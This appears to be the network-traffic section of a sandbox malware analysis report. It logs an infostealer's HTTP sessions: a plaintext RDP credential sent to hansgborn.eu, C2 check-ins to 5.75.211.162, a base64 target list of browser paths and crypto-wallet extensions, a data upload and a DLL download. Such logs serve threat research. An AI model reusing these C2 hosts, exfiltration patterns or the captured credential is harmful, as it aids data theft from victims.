                                                                                    38192.168.2.449781172.67.128.1444431220C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-09-26 22:15:20 UTC261OUTPOST /api HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Content-Length: 8
                                                                                    Host: ballotnwu.site
                                                                                    2024-09-26 22:15:20 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                    Data Ascii: act=life
                                                                                    2024-09-26 22:15:20 UTC774INHTTP/1.1 200 OK
                                                                                    Date: Thu, 26 Sep 2024 22:15:20 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Set-Cookie: PHPSESSID=gf190kdknut4qo9uklc77f1voc; expires=Mon, 20 Jan 2025 16:01:59 GMT; Max-Age=9999999; path=/
                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                    Pragma: no-cache
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2F5g8enN0p7HB8Sqs4Z0AwpUEQeppwg8hwUbrrUZvYcQRqYWBpkKGrbRLSCNWxWAPPhRzJfC9E%2BT2ANVpvsIVim1W%2FpvtskKyq9e5Y%2F56S06BCRUpLvAauXJbb8R%2Bxx0RnQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8c969caf0a6c1879-EWR
                                                                                    2024-09-26 22:15:20 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                    Data Ascii: aerror #D12
                                                                                    2024-09-26 22:15:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    39192.168.2.449785188.114.96.34433396C:\ProgramData\AFHDGDGIID.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-09-26 22:15:35 UTC165OUTPOST /receive.php HTTP/1.1
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Host: hansgborn.eu
                                                                                    Content-Length: 58
                                                                                    Expect: 100-continue
                                                                                    Connection: Keep-Alive
                                                                                    2024-09-26 22:15:35 UTC25INHTTP/1.1 100 Continue
                                                                                    2024-09-26 22:15:35 UTC58OUTData Raw: 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33 26 75 73 65 72 3d 52 44 50 55 73 65 72 5f 66 65 63 38 31 30 36 61 26 70 61 73 73 77 6f 72 64 3d 44 6c 52 63 6d 56 51 57 63 30 49 36
                                                                                    Data Ascii: ip=8.46.123.33&user=RDPUser_fec8106a&password=DlRcmVQWc0I6
                                                                                    2024-09-26 22:15:36 UTC605INHTTP/1.1 200 OK
                                                                                    Date: Thu, 26 Sep 2024 22:15:36 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Vary: Accept-Encoding
                                                                                    X-Content-Type-Options: nosniff
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9CeM4%2BOu4BBIRGfDLXf9K81fAXox8sX%2BUuSti8T%2F67jpmoqOK0s6%2BT2A2aXDBMURafoqIfMDyp4DvQcdmx59zEJPpGU8f1zhPPTLAUAzmohDL08odZku%2Bw43XLUcqL4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8c969d1058b243fa-EWR
                                                                                    0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    40192.168.2.449786104.102.49.2544431144C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-09-26 22:15:40 UTC119OUTGET /profiles/76561199780418869 HTTP/1.1
                                                                                    Host: steamcommunity.com
                                                                                    Connection: Keep-Alive
                                                                                    Cache-Control: no-cache
                                                                                    2024-09-26 22:15:40 UTC1870INHTTP/1.1 200 OK
                                                                                    Server: nginx
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                    Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                    Cache-Control: no-cache
                                                                                    Date: Thu, 26 Sep 2024 22:15:40 GMT
                                                                                    Content-Length: 34725
                                                                                    Connection: close
                                                                                    Set-Cookie: sessionid=b1c5d99d14993d8aba4933fd; Path=/; Secure; SameSite=None
                                                                                    Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
                                                                                    2024-09-26 22:15:40 UTC14514INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c
                                                                                    Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
                                                                                    2024-09-26 22:15:40 UTC16384INData Raw: 65 6e 44 6f 6e 65 27 3a 20 66 61 6c 73 65 2c 20 27 74 6f 6f 6c 74 69 70 43 6c 61 73 73 27 3a 20 27 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 2c 20 27 74 6f 6f 6c 74 69 70 50 61 72 65 6e 74 27 3a 20 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 61 69 6e 65 72 27 2c 20 27 63 6f 72 72 65 63 74 46 6f 72 53 63 72 65 65 6e 53 69 7a 65 27 3a 20 66 61 6c 73 65 7d 29 3b 0d 0a 09 09 7d 29 3b 0d 0a 09 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 09 09 3c 64 69 76 20 69 64 3d 22 67 6c 6f 62 61 6c 5f 61 63 74 69 6f 6e 73 22 3e 0d 0a 09 09 09 3c 64 69 76 20 72 6f 6c 65 3d 22 6e
                                                                                    Data Ascii: enDone': false, 'tooltipClass': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#global_header .supernav_container', 'correctForScreenSize': false});});</script><div id="global_actions"><div role="n
                                                                                    2024-09-26 22:15:40 UTC3768INData Raw: 76 61 74 65 26 71 75 6f 74 3b 3a 74 72 75 65 7d 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 3e 56 69 65 77 20 6d 6f 72 65 20 69 6e 66 6f 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 20 24 4a 28 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 20 49 6e 69 74 50 72 6f 66 69 6c 65 53 75 6d 6d 61 72 79 28 20 67 5f 72 67 50 72 6f 66 69 6c 65 44 61 74 61 5b 27 73 75 6d 6d 61 72 79 27 5d 20 29 3b 20 7d 20 29 3b 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f
                                                                                    Data Ascii: vate&quot;:true}" class="whiteLink" class="whiteLink">View more info</span></div><script type="text/javascript"> $J( function() { InitProfileSummary( g_rgProfileData['summary'] ); } ); </script></div></div></div></
                                                                                    2024-09-26 22:15:40 UTC59INData Raw: 0d 0a 0d 0a 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 66 72 61 6d 65 20 2d 2d 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e
                                                                                    Data Ascii: </div>... responsive_page_frame --></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    41192.168.2.4497875.75.211.1624431144C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-09-26 22:15:41 UTC185OUTGET / HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                    Host: 5.75.211.162
                                                                                    Connection: Keep-Alive
                                                                                    Cache-Control: no-cache
                                                                                    2024-09-26 22:15:42 UTC158INHTTP/1.1 200 OK
                                                                                    Server: nginx
                                                                                    Date: Thu, 26 Sep 2024 22:15:41 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    2024-09-26 22:15:42 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    42192.168.2.4497885.75.211.1624431144C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-09-26 22:15:42 UTC277OUTPOST / HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary=----DAAFIIJDAAAAKFHIDAAA
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                    Host: 5.75.211.162
                                                                                    Content-Length: 256
                                                                                    Connection: Keep-Alive
                                                                                    Cache-Control: no-cache
                                                                                    2024-09-26 22:15:42 UTC256OUTData Raw: 2d 2d 2d 2d 2d 2d 44 41 41 46 49 49 4a 44 41 41 41 41 4b 46 48 49 44 41 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 38 42 32 39 41 38 33 39 37 35 30 33 30 31 32 33 34 33 35 37 36 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 44 41 41 46 49 49 4a 44 41 41 41 41 4b 46 48 49 44 41 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 39 30 38 34 30 61 38 34 36 64 30 31 37 65 37 62 30 39 35 66 37 35 34 33 63 64 66 32 64 31 35 0d 0a 2d 2d 2d 2d 2d 2d 44 41 41 46 49 49 4a 44 41 41 41 41 4b 46 48 49 44 41 41 41 2d 2d 0d
                                                                                    Data Ascii: ------DAAFIIJDAAAAKFHIDAAAContent-Disposition: form-data; name="hwid"28B29A8397503012343576-a33c7340-61ca------DAAFIIJDAAAAKFHIDAAAContent-Disposition: form-data; name="build_id"e90840a846d017e7b095f7543cdf2d15------DAAFIIJDAAAAKFHIDAAA--
                                                                                    2024-09-26 22:15:43 UTC158INHTTP/1.1 200 OK
                                                                                    Server: nginx
                                                                                    Date: Thu, 26 Sep 2024 22:15:43 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    2024-09-26 22:15:43 UTC69INData Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 39 61 33 35 38 30 63 33 32 37 63 34 32 35 33 61 37 61 62 65 66 34 36 37 37 61 64 32 39 37 34 34 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: 3a1|1|1|1|9a3580c327c4253a7abef4677ad29744|1|1|1|0|0|50000|10


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    43192.168.2.4497895.75.211.1624431144C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-09-26 22:15:44 UTC277OUTPOST / HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary=----DGHJECAFIDAFHJKFCGHI
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                    Host: 5.75.211.162
                                                                                    Content-Length: 331
                                                                                    Connection: Keep-Alive
                                                                                    Cache-Control: no-cache
                                                                                    2024-09-26 22:15:44 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 43 41 46 49 44 41 46 48 4a 4b 46 43 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 61 33 35 38 30 63 33 32 37 63 34 32 35 33 61 37 61 62 65 66 34 36 37 37 61 64 32 39 37 34 34 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 43 41 46 49 44 41 46 48 4a 4b 46 43 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 39 30 38 34 30 61 38 34 36 64 30 31 37 65 37 62 30 39 35 66 37 35 34 33 63 64 66 32 64 31 35 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 43 41 46 49 44 41 46 48 4a 4b 46 43 47 48 49 0d 0a 43 6f 6e 74
                                                                                    Data Ascii: ------DGHJECAFIDAFHJKFCGHIContent-Disposition: form-data; name="token"9a3580c327c4253a7abef4677ad29744------DGHJECAFIDAFHJKFCGHIContent-Disposition: form-data; name="build_id"e90840a846d017e7b095f7543cdf2d15------DGHJECAFIDAFHJKFCGHICont
                                                                                    2024-09-26 22:15:44 UTC158INHTTP/1.1 200 OK
                                                                                    Server: nginx
                                                                                    Date: Thu, 26 Sep 2024 22:15:44 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    2024-09-26 22:15:44 UTC1564INData Raw: 36 31 30 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 64 76 62 32 64 73 5a 53 42 44 61 48 4a 76 62 57 55 67 51 32 46 75 59 58 4a 35 66 46 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 4e 34 55 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4e 6f 63 6d 39 74 61 58 56 74 66 46 78 44 61 48 4a 76 62 57 6c 31 62 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 46 52 76 63 6d 4e 6f 66 46 78 55 62 33 4a 6a 61 46 78 56 63 32 56 79 49 45
                                                                                    Data Ascii: 610R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfENocm9taXVtfFxDaHJvbWl1bVxVc2VyIERhdGF8Y2hyb21lfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfFRvcmNofFxUb3JjaFxVc2VyIE


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    44192.168.2.4497905.75.211.1624431144C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-09-26 22:15:45 UTC277OUTPOST / HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary=----GDAECAECFCAAEBFHIEHD
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                    Host: 5.75.211.162
                                                                                    Content-Length: 331
                                                                                    Connection: Keep-Alive
                                                                                    Cache-Control: no-cache
                                                                                    2024-09-26 22:15:45 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 47 44 41 45 43 41 45 43 46 43 41 41 45 42 46 48 49 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 61 33 35 38 30 63 33 32 37 63 34 32 35 33 61 37 61 62 65 66 34 36 37 37 61 64 32 39 37 34 34 0d 0a 2d 2d 2d 2d 2d 2d 47 44 41 45 43 41 45 43 46 43 41 41 45 42 46 48 49 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 39 30 38 34 30 61 38 34 36 64 30 31 37 65 37 62 30 39 35 66 37 35 34 33 63 64 66 32 64 31 35 0d 0a 2d 2d 2d 2d 2d 2d 47 44 41 45 43 41 45 43 46 43 41 41 45 42 46 48 49 45 48 44 0d 0a 43 6f 6e 74
                                                                                    Data Ascii: ------GDAECAECFCAAEBFHIEHDContent-Disposition: form-data; name="token"9a3580c327c4253a7abef4677ad29744------GDAECAECFCAAEBFHIEHDContent-Disposition: form-data; name="build_id"e90840a846d017e7b095f7543cdf2d15------GDAECAECFCAAEBFHIEHDCont
                                                                                    2024-09-26 22:15:46 UTC158INHTTP/1.1 200 OK
                                                                                    Server: nginx
                                                                                    Date: Thu, 26 Sep 2024 22:15:46 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    2024-09-26 22:15:46 UTC5685INData Raw: 31 36 32 38 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62
                                                                                    Data Ascii: 1628TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    45192.168.2.4497915.75.211.1624431144C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-09-26 22:15:46 UTC277OUTPOST / HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary=----FCGCGDHJEGHJKFHJJJKJ
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                    Host: 5.75.211.162
                                                                                    Content-Length: 332
                                                                                    Connection: Keep-Alive
                                                                                    Cache-Control: no-cache
                                                                                    2024-09-26 22:15:46 UTC332OUTData Raw: 2d 2d 2d 2d 2d 2d 46 43 47 43 47 44 48 4a 45 47 48 4a 4b 46 48 4a 4a 4a 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 61 33 35 38 30 63 33 32 37 63 34 32 35 33 61 37 61 62 65 66 34 36 37 37 61 64 32 39 37 34 34 0d 0a 2d 2d 2d 2d 2d 2d 46 43 47 43 47 44 48 4a 45 47 48 4a 4b 46 48 4a 4a 4a 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 39 30 38 34 30 61 38 34 36 64 30 31 37 65 37 62 30 39 35 66 37 35 34 33 63 64 66 32 64 31 35 0d 0a 2d 2d 2d 2d 2d 2d 46 43 47 43 47 44 48 4a 45 47 48 4a 4b 46 48 4a 4a 4a 4b 4a 0d 0a 43 6f 6e 74
                                                                                    Data Ascii: ------FCGCGDHJEGHJKFHJJJKJContent-Disposition: form-data; name="token"9a3580c327c4253a7abef4677ad29744------FCGCGDHJEGHJKFHJJJKJContent-Disposition: form-data; name="build_id"e90840a846d017e7b095f7543cdf2d15------FCGCGDHJEGHJKFHJJJKJCont
                                                                                    2024-09-26 22:15:47 UTC158INHTTP/1.1 200 OK
                                                                                    Server: nginx
                                                                                    Date: Thu, 26 Sep 2024 22:15:47 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    2024-09-26 22:15:47 UTC119INData Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    46192.168.2.4497925.75.211.1624431144C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-09-26 22:15:48 UTC278OUTPOST / HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary=----KFBGDBFBKKJECBFHDGIE
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                    Host: 5.75.211.162
                                                                                    Content-Length: 7153
                                                                                    Connection: Keep-Alive
                                                                                    Cache-Control: no-cache
                                                                                    2024-09-26 22:15:48 UTC7153OUTData Raw: 2d 2d 2d 2d 2d 2d 4b 46 42 47 44 42 46 42 4b 4b 4a 45 43 42 46 48 44 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 61 33 35 38 30 63 33 32 37 63 34 32 35 33 61 37 61 62 65 66 34 36 37 37 61 64 32 39 37 34 34 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 42 47 44 42 46 42 4b 4b 4a 45 43 42 46 48 44 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 39 30 38 34 30 61 38 34 36 64 30 31 37 65 37 62 30 39 35 66 37 35 34 33 63 64 66 32 64 31 35 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 42 47 44 42 46 42 4b 4b 4a 45 43 42 46 48 44 47 49 45 0d 0a 43 6f 6e 74
                                                                                    Data Ascii: ------KFBGDBFBKKJECBFHDGIEContent-Disposition: form-data; name="token"9a3580c327c4253a7abef4677ad29744------KFBGDBFBKKJECBFHDGIEContent-Disposition: form-data; name="build_id"e90840a846d017e7b095f7543cdf2d15------KFBGDBFBKKJECBFHDGIECont
                                                                                    2024-09-26 22:15:49 UTC158INHTTP/1.1 200 OK
                                                                                    Server: nginx
                                                                                    Date: Thu, 26 Sep 2024 22:15:49 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    2024-09-26 22:15:49 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: 2ok0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    47192.168.2.4497935.75.211.1624431144C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-09-26 22:15:49 UTC193OUTGET /sqlp.dll HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                    Host: 5.75.211.162
                                                                                    Connection: Keep-Alive
                                                                                    Cache-Control: no-cache
